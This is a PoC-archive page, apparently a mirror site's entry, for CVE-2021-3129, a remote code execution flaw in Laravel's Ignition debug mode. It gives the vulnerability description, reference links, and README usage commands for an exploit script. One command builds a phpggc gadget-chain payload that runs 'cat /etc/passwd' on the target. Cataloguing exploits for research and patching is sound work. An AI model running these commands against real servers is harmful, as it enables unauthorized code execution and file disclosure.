Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%

CVE-2021-3129 PoC — Facade Ignition for Laravel 授权问题漏洞

Source
Associated Vulnerability
Title:Facade Ignition for Laravel 授权问题漏洞 (CVE-2021-3129)
Description:Ignition before 2.5.2, as used in Laravel and other products, allows unauthenticated remote attackers to execute arbitrary code because of insecure usage of file_get_contents() and file_put_contents(). This is exploitable on sites using debug mode with Laravel before 8.4.2.
Description
Laravel debug mode - Remote Code Execution (RCE)
Readme
# CVE-2021-3129
Laravel debug mode - Remote Code Execution (RCE)

- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3129
- https://www.ambionics.io/blog/laravel-debug-rce
- https://github.com/ambionics/phpggc

# Example
```bash
python3 exploit.py http://127.0.0.1:8080
```
```bash
python3 exploit.py http://127.0.0.1:8080 --phar $(php -d phar.readonly=off -d phar.require_hash=off ./phpggc --phar phar -f monolog/rce1 system 'cat /etc/passwd' | base64 -w 0)
```

File Snapshot

[4.0K] /data/pocs/df5d5402edd4d5603951cb69b1db323bf0d39a08 ├── [4.1K] exploit.py ├── [1.0K] LICENSE └── [ 471] README.md 0 directories, 3 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →